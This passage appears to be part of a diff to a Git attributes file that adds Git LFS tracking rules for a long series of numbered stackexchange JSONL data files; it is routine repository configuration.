+data/stackexchange/1-1/1309_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/130_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1310_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1311_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1312_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1313_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1314_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1315_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1316_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1317_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1318_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1319_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/131_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1320_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1321_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1322_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1323_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1324_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1325_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1326_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1327_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1328_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1329_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/132_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1330_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1331_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1332_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1333_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1334_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1335_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1336_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1337_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1338_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1339_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/133_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1340_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1341_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1342_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1343_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1344_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1345_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1346_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1347_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1348_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1349_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/134_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1350_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1351_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1352_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1353_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1354_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1355_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1356_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1357_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1358_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1359_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/135_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1360_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1361_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1362_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1363_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1364_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1365_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1366_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1367_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1368_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1369_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/136_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1370_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1371_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1372_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1373_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1374_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1375_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1376_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1377_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1378_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1379_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/137_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1380_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1381_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1382_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1383_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1384_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1385_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1386_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1387_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1388_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1389_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/138_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1390_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1391_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1392_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1393_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1394_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1395_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1396_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1397_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1398_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1399_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/139_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/13_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1400_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1401_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1402_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1403_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1404_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1405_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1406_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1407_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1408_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1409_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/140_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1410_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1411_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1412_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1413_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1414_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1415_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1416_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1417_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1418_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1419_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/141_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1420_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1421_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1422_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1423_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1424_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1425_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1426_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1427_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1428_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1429_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/142_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1430_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1431_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1432_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1433_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1434_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1435_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1436_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1437_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1438_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1439_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/143_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1440_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1441_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1442_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1443_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1444_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1445_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1446_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1447_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1448_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1449_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/144_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1450_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1451_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1452_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1453_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1454_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1455_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1456_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1457_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1458_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1459_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/145_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1460_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1461_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1462_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1463_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1464_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1465_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1466_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1467_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1468_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1469_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/146_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1470_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1471_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1472_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1473_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1474_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1475_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1476_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1477_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1478_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1479_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/147_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1480_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1481_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1482_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1483_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1484_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1485_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1486_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1487_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1488_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1489_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/148_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1490_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1491_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1492_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1493_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1494_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1495_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1496_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1497_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1498_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1499_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/149_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/14_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1500_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1501_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1502_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1503_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1504_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1505_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1506_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1507_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1508_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1509_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/150_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1510_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1511_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1512_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1513_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1514_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1515_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1516_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1517_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1518_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1519_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/151_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1520_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1521_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1522_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1523_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1524_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1525_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1526_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1527_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1528_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1529_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/152_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1530_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1531_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1532_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1533_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1534_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1535_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1536_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1537_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1538_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1539_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/153_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1540_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1541_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1542_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1543_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1544_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1545_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1546_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1547_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1548_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1549_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/154_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1550_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1551_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1552_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1553_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1554_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1555_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1556_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1557_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1558_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1559_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/155_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1560_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1561_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1562_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1563_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1564_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1565_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1566_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1567_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1568_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1569_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/156_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1570_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1571_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1572_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1573_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1574_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1575_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1576_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1577_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1578_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1579_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/157_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1580_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1581_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1582_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1583_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1584_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1585_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1586_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1587_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1588_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1589_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/158_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1590_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1591_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1592_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1593_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1594_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1595_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1596_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1597_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1598_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1599_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/159_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/15_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1600_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1601_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1602_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1603_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1604_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1605_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1606_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1607_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1608_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1609_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/160_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1610_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1611_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1612_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1613_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1614_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1615_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1616_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1617_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1618_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1619_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/161_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1620_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1621_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1622_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1623_2289.jsonl 